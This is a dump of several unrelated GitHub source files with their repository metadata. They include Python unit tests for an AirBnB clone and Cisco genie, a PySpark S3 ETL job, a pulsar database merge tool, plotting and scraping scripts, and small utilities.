many args raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.to_dict(self, 98)\n error_msg = \"to_dict() takes 1 positional argument but 2 were given\"\n self.assertEqual(str(e.exception), error_msg)\n\n def test_instantiate_kwargs(self):\n \"\"\"This is to test instantiation with **kwargs.\"\"\"\n\n # Create a BaseModel instance\n model = BaseModel()\n\n # Set some attributes\n model.extra_info = \"ExtraInfo\"\n model.rating = 5\n\n # Convert the BaseModel instance to a dictionary\n model_json = model.to_dict()\n\n # Create a new BaseModel instance from the dictionary\n new_model = BaseModel(**model_json)\n\n # Check that the attributes of the new instance\n # match the original instance\n self.assertEqual(new_model.to_dict(), model.to_dict())\n\n def test_instantiate_dict(self):\n \"\"\"This is to test instantiation with **kwargs from custom dict.\"\"\"\n\n # Create a custom dictionary with attributes\n custom_dict = {\n \"__class__\": \"BaseModel\",\n \"updated_at\": datetime(\n 2039, 18, 20, 43, 59, 59, 13579\n ).isoformat(),\n \"created_at\": datetime.now().isoformat(),\n \"id\": uuid.uuid4(),\n \"custom_attr\": \"CustomValue\",\n \"int_attr\": 42,\n \"float_attr\": 3.1416\n }\n\n # Create a BaseModel instance using the custom dictionary\n obj = BaseModel(**custom_dict)\n\n # Check that the attributes of the instance match the custom dictionary\n self.assertEqual(obj.to_dict(), custom_dict)\n\n def test_save_storage(self):\n \"\"\"This is to test that storage.save() is called from save().\"\"\"\n self.clearStorageData()\n\n # Create a BaseModel instance\n bm = BaseModel()\n\n # Call the save() method\n bm.save()\n\n # Create a key for the object in the storage format\n key = \"{}.{}\".format(type(bm).__name__, bm.id)\n\n # Create a dictionary with the object's data\n data = {key: bm.to_dict()}\n\n # Check that the file storage file exists\n self.assertTrue(os.path.isfile(FileStorage._FileStorage__file_path))\n\n # Check that the data in the file matches the expected data\n with open(\n FileStorage._FileStorage__file_path, \"r\", encoding=\"utf-8\"\n ) as f:\n self.assertEqual(len(f.read()), len(json.dumps(data)))\n f.seek(0)\n self.assertEqual(json.load(f), data)\n\n def test_save_no_args(self):\n \"\"\"This is to test save() with no arguments.\"\"\"\n self.clearStorageData()\n\n # Check that trying to call save() with no arguments raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.save()\n error_msg = \"save() missing 1 required positional argument: 'self'\"\n self.assertEqual(str(e.exception), error_msg)\n\n def test_save_excess_args(self):\n \"\"\"This is to test save() with too many arguments.\"\"\"\n self.clearStorageData()\n\n # Check that trying to call save() with too many args raises an error\n with self.assertRaises(TypeError) as e:\n BaseModel.save(self, 98)\n error_msg = \"save() takes 1 positional argument but 2 were given\"\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nadiaMahfoud/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":10602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73739475529","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport logging\n\nfrom client_s3 import clientS3\nimport client_spark\n\nparser = argparse.ArgumentParser(prog=\"Projeto Florestas Plantadas - Converter Arquivo CSV\",\n description=\"Job converter 
arquivos\")\n\nparser.add_argument(\"-f\", \"--filename\")\n\ntry:\n args = parser.parse_args()\n nomeArquivoCompactado = args.filename\n\n BUCKET_RAW = \"snif-florestal-raw\"\n BUCKET_STAGE = \"snif-florestal-stage\"\n BUCKET_ANALYTICS = \"snif-florestal-analytics\"\n\n objetosS3 = clientS3.list_objects(Bucket=BUCKET_RAW)\n\n for obj in objetosS3.get(\"Contents\"):\n chave = obj[\"Key\"]\n ano, mes, dia, etapa, nomeArquivo = chave.split(\"/\")\n\n if etapa == \"downloaded\":\n diretorioArquivoCSV = nomeArquivo[:-4]\n\n logging.info(f\"Lendo arquivo arquivo {chave}\")\n spark_client = client_spark.obterSparkClient(f\"convert-{diretorioArquivoCSV}\")\n\n dfArquivo = spark_client \\\n .read \\\n .csv(f\"s3a://{BUCKET_RAW}/{chave}\", sep=\";\", header=True, encoding=\"iso-8859-1\") \\\n .withColumnsRenamed(\n {\n \"Ano\": \"data_base\",\n \"Ano_PEVS\": \"ano_data_base\",\n \"Região\": \"regiao\",\n \"Nome UF\": \"nome_uf\",\n \"Sigla UF\": \"sigla_uf\",\n \"Código Microrregião\": \"codigo_microrregiao\",\n \"Nome Microrregião\": \"nome_microrregiao\",\n \"Microrregião Geográfica\": \"microrregiao\",\n \"Código Município Completo\": \"codigo_municipio\",\n \"Município\": \"municipio\",\n \"Município Geográfico\": \"municipio_geografico\",\n \"Espécie florestal\": \"especie_florestal\",\n \"Área (ha)\": \"area_ha\"\n })\\\n .na.fill(value=\"0\",subset=[\"area_ha\"])\n\n logging.info(f\"Total registros no arquivo: {dfArquivo.count()}\")\n print(\"===========================================\")\n dfArquivo.show(5)\n print(\"===========================================\")\n\n logging.info(f\"Salvando arquivo {nomeArquivo} no bucket stage no formato *.csv...\")\n\n dfArquivo.write.csv(\n path=f\"s3a://{BUCKET_STAGE}/{diretorioArquivoCSV}\",\n mode=\"overwrite\",\n header=True,\n sep=\",\")\n\n logging.info(f\"Arquivo {nomeArquivo} salvo no bucket stage [{BUCKET_STAGE}/{diretorioArquivoCSV}].\")\n\n logging.info(f\"Salvando arquivo {nomeArquivo} no bucket analytics no formato *.parquet...\")\n\n dfArquivo.write.parquet(\n path=f\"s3a://{BUCKET_ANALYTICS}/{diretorioArquivoCSV}\",\n mode=\"overwrite\")\n\n logging.info(f\"Arquivo {nomeArquivo} salvo no bucket analytics [{BUCKET_ANALYTICS}/{diretorioArquivoCSV}].\")\n\n # Fazer cópia do arquivo para a pasta processado e apagar da pasta de download\n novaChave = chave.replace(\"downloaded\", \"processed\")\n\n clientS3.copy_object(\n CopySource={'Bucket': BUCKET_RAW, 'Key': chave},\n Bucket=BUCKET_RAW,\n Key=novaChave)\n\n clientS3.delete_object(Bucket=BUCKET_RAW, Key=chave)\n\n logging.info(f\"Arquivo {nomeArquivo} movido para a pasta de processados.\")\n\nexcept Exception as e:\n logging.error(f\"Erro ao processar o arquivo {nomeArquivoCompactado}. [{e.args}]\")\n raise e\n","repo_name":"DanielCirino/eng-dados-snif-florestal","sub_path":"floresta-plantada-etl/dags/job_converter_arquivo.py","file_name":"job_converter_arquivo.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7990341220","text":"#!/usr/bin/env python3\n\n###############################################################################\n# #\n# Program name: print_dict.py #\n# Purpose: Process data from the shell script and print the #\n# corresponding dictionary entries. 
#\n# #\n# Author: Josua Goecking #\n# GitHub: https://github.com/JosuaGoecking/weica #\n# #\n###############################################################################\n\nimport sys\n\npath=sys.argv[1]\nsys.path.insert(0, path)\n\nimport weica\n\nli=[]\nif len(sys.argv)==3:\n li=sys.argv[2].split(\";\")\n \nc=weica.consumption(\"q\")\n\nif len(li)!=0:\n c.print_dict(li)\nelse:\n c.print_dict()\n","repo_name":"JosuaGoecking/weica","sub_path":"bin/print_dict.py","file_name":"print_dict.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42324739861","text":"# Python\r\nimport unittest\r\n\r\n# pyATS\r\nfrom pyats.topology import Device\r\n\r\n# Genie\r\nfrom genie.libs.ops.platform.iosxe.c8200.platform import Platform\r\nfrom genie.libs.ops.platform.iosxe.c8200.tests.platform_output import PlatformOutput\r\nfrom genie.libs.parser.iosxe.show_platform import ShowVersion, \\\r\n Dir, \\\r\n ShowRedundancy, \\\r\n ShowInventory, \\\r\n ShowPlatform\r\nfrom genie.libs.parser.iosxe.show_issu import ShowIssuStateDetail,\\\r\n ShowIssuRollbackTimer\r\n\r\n\r\nclass TestPlatformAll(unittest.TestCase):\r\n\r\n maxDiff = None\r\n\r\n def setUp(self):\r\n self.device = Device(name='aDevice')\r\n self.device.os = 'iosxe'\r\n self.device.mapping={}\r\n self.device.mapping['cli']='cli'\r\n # Give the device as a connection type\r\n # This is done in order to call the parser on the output provided\r\n self.device.connectionmgr.connections['cli'] = self.device\r\n\r\n def test_complete_c8200(self):\r\n self.maxDiff = None\r\n f = Platform(device=self.device)\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n\r\n self.assertEqual(f.chassis, PlatformOutput.platform_all['chassis'])\r\n self.assertEqual(f.chassis_sn, PlatformOutput.platform_all['chassis_sn'])\r\n self.assertEqual(f.rtr_type, PlatformOutput.platform_all['rtr_type'])\r\n self.assertEqual(f.os, PlatformOutput.platform_all['os'])\r\n self.assertEqual(f.version, PlatformOutput.platform_all['version'])\r\n self.assertEqual(f.image, PlatformOutput.platform_all['image'])\r\n self.assertEqual(f.config_register, PlatformOutput.platform_all['config_register'])\r\n self.assertEqual(f.main_mem, PlatformOutput.platform_all['main_mem'])\r\n self.assertEqual(f.dir, PlatformOutput.platform_all['dir'])\r\n self.assertEqual(f.redundancy_mode, PlatformOutput.platform_all['redundancy_mode'])\r\n self.assertEqual(f.switchover_reason, PlatformOutput.platform_all['switchover_reason'])\r\n self.assertEqual(f.redundancy_communication, PlatformOutput.platform_all['redundancy_communication'])\r\n self.assertEqual(f.rp_uptime, PlatformOutput.platform_all['rp_uptime'])\r\n self.assertEqual(f.issu_rollback_timer_reason, PlatformOutput.platform_all['issu_rollback_timer_reason'])\r\n self.assertEqual(f.issu_rollback_timer_state, PlatformOutput.platform_all['issu_rollback_timer_state'])\r\n self.assertDictEqual(f.slot, 
PlatformOutput.platform_all['slot'])\r\n\r\n def test_missing_attributes_c8200(self):\r\n\r\n f = Platform(device=self.device)\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n with self.assertRaises(KeyError):\r\n # slot 'R2' doesn't exist\r\n platform_slot_number = (f.slot['slot']['R2'])\r\n\r\n def test_ignored_c8200(self):\r\n\r\n f = Platform(device=self.device)\r\n g = Platform(device=self.device)\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n g.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n g.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n g.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n g.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n g.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n g.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n g.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n g.learn()\r\n\r\n f.s = 2\r\n\r\n self.assertNotEqual(f, g)\r\n # Verify diff now\r\n diff = f.diff(g)\r\n sorted_diff = str(diff)\r\n sorted_result = ('+s: 2')\r\n self.assertEqual(sorted_diff, sorted_result)\r\n\r\n def test_selective_attribute_c8200(self):\r\n\r\n f = Platform(device=self.device, attributes=['slot[(.*)][(.*)][state]'])\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDir}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n {'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n\r\n self.assertIn('ok, active', f.slot['rp']['R0']['state'])\r\n\r\n def test_empty_parser_output_c8200(self):\r\n\r\n f = Platform(device=self.device)\r\n\r\n f.maker.outputs[ShowVersion] = \\\r\n {'':PlatformOutput.showVersion}\r\n # loading empty output\r\n f.maker.outputs[Dir] = \\\r\n {'':PlatformOutput.showDirEmpty}\r\n f.maker.outputs[ShowRedundancy] = \\\r\n {'':PlatformOutput.showRedundancy}\r\n f.maker.outputs[ShowInventory] = \\\r\n {'':PlatformOutput.showInventory}\r\n f.maker.outputs[ShowPlatform] = \\\r\n 
{'':PlatformOutput.showPlatform}\r\n f.maker.outputs[ShowIssuStateDetail] = \\\r\n {'':PlatformOutput.ShowIssuStateDetail}\r\n f.maker.outputs[ShowIssuRollbackTimer] = \\\r\n {'':PlatformOutput.ShowIssuRollbackTimer}\r\n\r\n f.learn()\r\n\r\n self.maxDiff = None\r\n self.assertDictEqual(f.slot, PlatformOutput.platform_all_empty_dir['slot'])\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/ops-pkg/src/genie/libs/ops/platform/iosxe/c8200/tests/test_platform.py","file_name":"test_platform.py","file_ext":"py","file_size_in_byte":7724,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"} +{"seq_id":"23000761616","text":"\"\"\"mysite_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path, include\nfrom . import views\n\napp_name = 'main'\n\nurlpatterns = [\n path('', views.homepage, name='homepage'),\n path('register/', views.register, name='register'),\n path('logout/', views.logout_request, name='logout'),\n path('login/', views.login_request, name='login'),\n # 这是一个变量\n path('<single_slug>', views.single_slug, name='single_slug'),\n\n path('upload/', views.upload, name='upload'),\n path('books/', views.book_list, name='book_list'),\n path('books/upload', views.upload_book, name='upload_book'),\n path('books/<int:pk>/', views.delete_book, name='delete_book'),\n\n path('class/books/', views.BookList.as_view(), name='class_book_list'),\n path('class/books/upload', views.UploadBookView.as_view(), name='class_upload_book'),\n]\n","repo_name":"oceanwavechina/python_programming","sub_path":"mysite_django/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"375228197","text":"#!/usr/bin/env python\n\nfrom toaster import utils\nfrom toaster import errors\nfrom toaster import database\nfrom toaster.utils import cache\nfrom toaster.utils import notify\n\nSHORTNAME = 'merge'\nDESCRIPTION = \"Merge a pulsar entry in the database into another entry. \" \\\n \"This is useful when a second entry was created for a \" \\\n \"pulsar rather than creating an alias of an existing entry. \" \\\n \"This is an irreversible process.\"\n\n\ndef add_arguments(parser):\n parser.add_argument('-p', '--psr', dest='src_psrname', type=str,\n help=\"The pulsar to merge. 
NOTE: All instances \"\n \"of this pulsar's corresponding ID number \"\n \"will be changed in the database.\")\n parser.add_argument('--into', dest='dest_psrname', type=str,\n help=\"The pulsar entry to be merged into.\")\n\n\ndef merge_pulsar(src_pulsar_id, dest_pulsar_id, existdb=None):\n \"\"\"Merge one pulsar entry into another.\n\n Inputs:\n src_pulsar_id: The ID of the pulsar entry that will \n be merged.\n NOTE: This entry will no longer exist following\n the merge.\n dest_pulsar_id: The ID of the pulsar entry that will\n be merged into.\n\n existdb: A (optional) existing database connection object.\n (Default: Establish a db connection)\n\n Outputs:\n None\n \"\"\"\n notify.print_info(\"Merging pulsar '%s' (ID: %d) into '%s' (ID: %d)\" %\n (cache.get_pulsarname(src_pulsar_id), src_pulsar_id,\n cache.get_pulsarname(dest_pulsar_id), dest_pulsar_id), 2)\n # Connect to the database\n db = existdb or database.Database()\n db.connect()\n trans = db.begin()\n try:\n # Update all relevant entries in the database\n tables = [db.pulsar_aliases,\n db.timfiles,\n db.rawfiles,\n db.templates,\n db.parfiles,\n db.master_parfiles,\n db.master_templates,\n db.toas]\n values = {'pulsar_id': dest_pulsar_id}\n for table in tables:\n update = table.update().\\\n where(table.c.pulsar_id == src_pulsar_id)\n results = db.execute(update, values)\n results.close()\n\n # Remove now unused entry in the pulsars table\n delete = db.pulsars.delete().\\\n where(db.pulsars.c.pulsar_id == src_pulsar_id)\n results = db.execute(delete)\n results.close()\n except:\n trans.rollback()\n raise\n else:\n trans.commit()\n finally:\n if existdb is None:\n db.close()\n\n\ndef main(args):\n src_pulsar_id = cache.get_pulsarid(args.src_psrname)\n dest_pulsar_id = cache.get_pulsarid(args.dest_psrname)\n if src_pulsar_id == dest_pulsar_id:\n raise errors.BadInputError(\"Cannot merge '%s' (ID: %d) into \"\n \"itself ('%s')\" %\n (args.src_psrname, src_pulsar_id,\n args.dest_psrname))\n merge_pulsar(src_pulsar_id, dest_pulsar_id)\n\n\nif __name__ == '__main__':\n parser = utils.DefaultArguments(description=DESCRIPTION)\n add_arguments(parser)\n args = parser.parse_args()\n main(args)","repo_name":"plazar/TOASTER","sub_path":"toolkit/pulsars/merge_pulsar.py","file_name":"merge_pulsar.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70443114567","text":"import time\nimport matplotlib.pyplot as plt\nimport math\n\n\ndef main():\n with open('ProblemScaling.txt', 'r+') as f:\n lines = f.readlines()\n timeL = []\n for i in range(0,len(lines),2):\n times = lines[i + 1].split(' ')\n times = [[int(time) + 1,times[time]] for time in range(len(times)) if '\\n' not in times[time]]\n timeL += [[lines[i].replace('\\n',''), times]]\n plt.title(\"Weak Scaling Test\")\n print(timeL)\n # plt.axis([1,5,0, 25])\n\n for test in timeL:\n print(test)\n #Graphing strong scaling\n newResult = [float(test[1][0][1])/ float(timing[1]) for timing in test[1]]\n # print(newResult)\n # newResult = [(float(timing[1])) for timing in test[1]]\n newResult = [0] + newResult\n print(newResult)\n print(test[0])\n\n plt.plot(newResult, linewidth = 2.0, label = test[0])\n # plt.legend(bbox_to_anchor=(1.05, 1), loc=3, borderaxespad=0.)\n plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=4,\n ncol=1, borderaxespad=0.)\n plt.xlabel(\"Problem Scale\")\n plt.ylabel('Runtime (s)')\n plt.show()\n\n\n\ndef main2():\n with open('ProcessorTimesFinal.txt', 'r+') as f:\n 
lines = f.readlines()\n timeL = []\n for i in range(0,len(lines),2):\n times = lines[i + 1].split(' ')\n times = [[int(time) + 1,times[time]] for time in range(len(times)) if '\\n' not in times[time]]\n timeL += [[lines[i].replace('\\n',''), times]]\n #print(timeL)\n\n print(timeL)\n plt.title(\"Strong Scaling Efficiency vs Number of Processes\")\n plt.axis([1,5, 0, 1.6])\n for timeResult in timeL:\n # print(timeResult)\n # print(timeResult[1][0][0])\n\n #Scaling Efficiency Graph\n newResult = [[float(timeResult[1][0][1])/(float(timing[1]) *float(timing[0]))] for timing in timeResult[1]]\n newResult = [[0]] + newResult\n\n #For percentage graph\n # newResult = [[float(timing[1])/float(timeResult[1][0][1] *)] for timing in timeResult[1]]\n # newResult = newResult\n # newResult = [[0]] + newResult \n\n #Sqrt magnitude plot\n # newResult = [[math.sqrt(float(timing[1]))] for timing in timeResult[1]]\n # newResult = newResult\n # newResult = [[0]] + newResult\n if timeResult[0] == 'allhomes' or timeResult[0] == 'homes17' or timeResult[0] == 'homes18':\n plt.plot(newResult, linewidth = 2.0, label = timeResult[0])\n plt.legend(bbox_to_anchor=(1.02, 0., 1.5, .102), loc=3,\n ncol=1, borderaxespad=0.)\n\n plt.xlabel(\"Number of Processors\")\n plt.ylabel(\"Strong Scaling Efficiency\") \n #log graph\n # newResult = [[math.log(float(timing[1]))] for timing in timeResult[1]]\n # newResult = [[0]] + newResult\n # plt.plot(newResult, linewidth = 2.0)\n\n #print(newResult)\n # For real time plots\n #newResult = [[float(timing[1])] for timing in timeResult[1]]\n\n #plt.plot(timingResult[1], linewidth = 2.0)\n plt.show()\n\n\nif __name__ == '__main__':\n main2()","repo_name":"KanishkT123/ParallelCDC","sub_path":"graphData.py","file_name":"graphData.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"10215947691","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport ctypes\nimport mmap\nimport os\nimport struct\n\nimport six\n\n\nPERTURB_SHIFT = 5\n\n\ndef stable_hash_py2(str_value):\n if not str_value:\n return 0\n x = ord(str_value[0]) << 7\n for c in str_value:\n x = ctypes.c_long(1000003 * x).value\n x ^= ord(c)\n\n x ^= len(str_value)\n return x\n\n\ndef stable_hash_py3(str_value):\n if not str_value:\n return 0\n x = str_value[0] << 7\n for c in str_value:\n x = ctypes.c_long(1000003 * x).value\n x ^= c\n\n x ^= len(str_value)\n return x\n\n\nstable_hash = stable_hash_py3 if six.PY3 else stable_hash_py2\n\n\nclass DirtyError(Exception):\n pass\n\n\nclass LedadaReadMap(object):\n\n def __init__(self, filepath):\n fd = os.open(filepath, os.O_RDONLY)\n self.buf = mmap.mmap(fd, 0, mmap.MAP_SHARED, mmap.PROT_READ)\n os.close(fd)\n if self.buf[:4] == b'LEDD':\n raise DirtyError('File is dirty.')\n if self.buf[:4] != b'LEDA':\n raise ValueError('Incorrect file format.')\n self.num_buckets = struct.unpack_from('I', self.buf, 4)[0]\n self.buckets_start = 8\n self.payload_start = self.buckets_start + self.num_buckets * 4\n\n def get(self, name, default=None):\n if self.buf[3] == 'D':\n raise DirtyError('File is dirty.')\n\n if isinstance(name, six.text_type):\n name = name.encode('utf8')\n\n hash_ = stable_hash(name)\n idx = hash_ & (self.num_buckets - 1)\n perturb = hash_\n if perturb < 0:\n perturb += 2 ** 64\n\n while True:\n chunk_pointer = struct.unpack_from('I', self.buf, self.buckets_start + idx * 4)[0]\n if not chunk_pointer:\n return default\n\n key_len, value_len = struct.unpack_from('HH', 
self.buf, chunk_pointer)\n key = struct.unpack_from('%ds' % key_len, self.buf, chunk_pointer + 4)[0]\n if key == name:\n return struct.unpack_from('%ds' % value_len, self.buf, chunk_pointer + 4 + key_len)[0]\n\n idx = (5 * idx) + 1 + perturb\n perturb >>= PERTURB_SHIFT\n idx &= (self.num_buckets - 1)\n\n def uget(self, name, default=None):\n result = self.get(name, default)\n if result is None:\n return None\n return result.decode('utf8')\n","repo_name":"modrykonik/ledadamap","sub_path":"ledadamap.py","file_name":"ledadamap.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"205300896","text":"import csv\nimport urllib\nimport time\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, render_template, request, url_for, redirect\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n\t# It's just a plain vanilla form. Just return it.\n\treturn render_template('index.html')\n\n@app.route(\"/scrapr\", methods=['POST'])\ndef parse():\n\t# Get the URL submitted, open the connection, get results, and start\n\t# parsing the object.\n\turl_to_fetch = request.form['url']\n\tconnection = urllib.urlopen(url_to_fetch)\n\ttext = connection.read()\n\tpage_soup = BeautifulSoup(text)\n\n\t# Open the CSV file for writing. We will end up returning this.\n\tcsvFilename = \"output_\" + str(int(time.time())) + \".csv\"\n\tcsvFile = open(\"static/\" + csvFilename, \"w\")\n\tcsvWriter = csv.writer(csvFile, delimiter=',')\n\n\t# For every table, create a soup to process all of its individual parts.\n\tfor table in page_soup.find_all(\"table\"):\n\t\ttable_soup = BeautifulSoup(str(table))\n\n\t\tfor body in table_soup:\n\t\t\tbody = BeautifulSoup(str(body))\n\t\t\trows = body.find_all(\"tr\")\n\n\t\t\tfor tr in rows:\n\t\t\t\tcols = tr.find_all([\"td\", \"th\"])\n\t\t\t\tcolsArr = []\n\n\t\t\t\tfor td in cols:\n\t\t\t\t\tdata_set = unicode(td.string).strip()\n\t\t\t\t\t\n\t\t\t\t\t# Expand any headers that might span more than 1 column.\n\t\t\t\t\tif \"colspan\" in td.attrs:\n\t\t\t\t\t\ttimes_to_repeat = int(td[\"colspan\"])\n\t\t\t\t\telse:\n\t\t\t\t\t\ttimes_to_repeat = 1\n\n\t\t\t\t\t# Append to accumulated array as appropriate.\n\t\t\t\t\tif data_set.isdigit():\n\t\t\t\t\t\tdata_set = int(data_set)\n\n\t\t\t\t\tfor i in range(times_to_repeat):\n\t\t\t\t\t\tcolsArr.append(data_set)\n\n\t\t\t\tcsvWriter.writerow(colsArr)\n\n\t\t\t# Write an empty row just to give some space.\n\t\t\tcsvWriter.writerow([])\n\tcsvFile.close()\n\n\treturn redirect(url_for(\"static\", filename=csvFilename))\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug = True, port=8080)","repo_name":"mauryquijada/scrapr","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8618437203","text":"# import pandas as pd\n\n# file_paths = ['C:/Users/HP/Desktop/appname.xlsx', 'C:/Users/HP/Desktop/developername.xlsx', 'C:/Users/HP/Desktop/appname.xlsx/appemail.xlsx', 'C:/Users/HP/Desktop/reviews.xlsx', 'C:/Users/HP/Desktop/charge.xlsx']\n# column_names = ['Email-Phone', 'Appname', 'Developername', 'AppEmail', 'Review', 'Charge']\n\n# dfs = []\n# for file_path in file_paths:\n# data = pd.read_excel(file_path)\n# dfs.append(data)\n# merged_data = pd.concat(dfs, ignore_index=True)\n# merged_data.columns = column_names\n# merged_data.to_excel('merged_file.xlsx', index=False)\n\nimport pandas as 
pd\n\nfile_paths = [\n 'D:/wanbuffer/django/emailphone.xlsx',\n 'D:/wanbuffer/django/appname.xlsx',\n 'D:/wanbuffer/django/developername.xlsx',\n 'D:/wanbuffer/django/appemail.xlsx',\n 'D:/wanbuffer/django/charge.xlsx',\n 'D:/wanbuffer/django/rating.xlsx',\n 'D:/wanbuffer/django/reviews.xlsx'\n]\ncolumn_names = ['Email-Phone', 'Appname', 'Developername', 'AppEmail', 'Charge', 'Rating', 'Review']\n\ndfs = []\nfor file_path in file_paths:\n data = pd.read_excel(file_path)\n dfs.append(data)\n\nmerged_data = pd.concat(dfs, axis=1)\nmerged_data.columns = column_names\n\nmerged_data.to_excel('merged_file1.xlsx', index=False)\n","repo_name":"lakumbhavdip/webscraping","sub_path":"mergeexcel.py","file_name":"mergeexcel.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11935366010","text":"valores = input().split()\nN1, N2, N3, N4 = valores\n\nN1 = float(N1)\nN2 = float(N2)\nN3 = float(N3)\nN4 = float(N4)\n\nnotaExame = 0.0\nmedia = ((N1*2)+(N2*3)+(N3*4)+(N4*1))/10\n\nprint(\"Media: %.1f\" %media)\n\nif (media >= 7.0):\n print(\"Aluno aprovado.\")\n\nif (media < 5.0):\n print(\"Aluno reprovado.\")\n\nif (media >= 5.0 and media <= 6.9):\n print(\"Aluno em exame.\")\n notaExame = float(input())\n print(\"Nota do exame: %.1f\" %notaExame)\n media = (media + notaExame) /2\n\n if (media >=5.0):\n print(\"Aluno aprovado.\")\n else:\n print(\"Aluno reprovado.\")\n print('Media final: %.1f' %media)\n","repo_name":"alexsfo/uri-online-judge-python","sub_path":"URI_1040.py","file_name":"URI_1040.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70626138568","text":"#translates NCBI taxids in default kraken2 output to names 